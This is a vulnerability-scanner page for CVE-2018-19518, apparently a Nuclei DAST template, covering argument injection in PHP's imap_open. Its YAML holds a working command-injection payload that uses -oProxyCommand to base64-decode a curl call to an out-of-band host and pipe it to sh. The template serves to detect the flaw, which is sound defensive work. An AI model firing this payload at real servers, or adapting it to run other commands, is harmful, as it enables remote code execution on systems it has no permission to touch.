PHP imap - Remote Command Execution

ID: CVE-2018-19518

Severity: high

Author: princechaddha

Tags: imap,dast,vulhub,cve,cve2018,rce,oast,php

Description

University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a “-oProxyCommand” argument.

YAML Source

id: CVE-2018-19518

info:
  name: PHP imap - Remote Command Execution
  author: princechaddha
  severity: high
  description: |
    University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19518
    - https://www.openwall.com/lists/oss-security/2018/11/22/3
    - https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.5
    cve-id: CVE-2018-19518
    cwe-id: CWE-88
  metadata:
    max-request: 1
    confidence: tenative
  tags: imap,dast,vulhub,cve,cve2018,rce,oast,php

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      php-imap:
        - "x -oProxyCommand=echo {{base64(url_encode('curl {{interactsh-url}}'))}}|base64 -d|sh}"

    fuzzing:
      - part: query
        fuzz:
          - "{{php-imap}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4b0a004830460221008543f7f2f49f049446873dd3c5bc4fb5a4a615e4633405b40698ddf599348551022100ea2a4180689633d4ed52d2be2b916ed056f3a39bdca0a8511dce2dfb572efe27:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "dast/cves/2018/CVE-2018-19518.yaml"

View on Github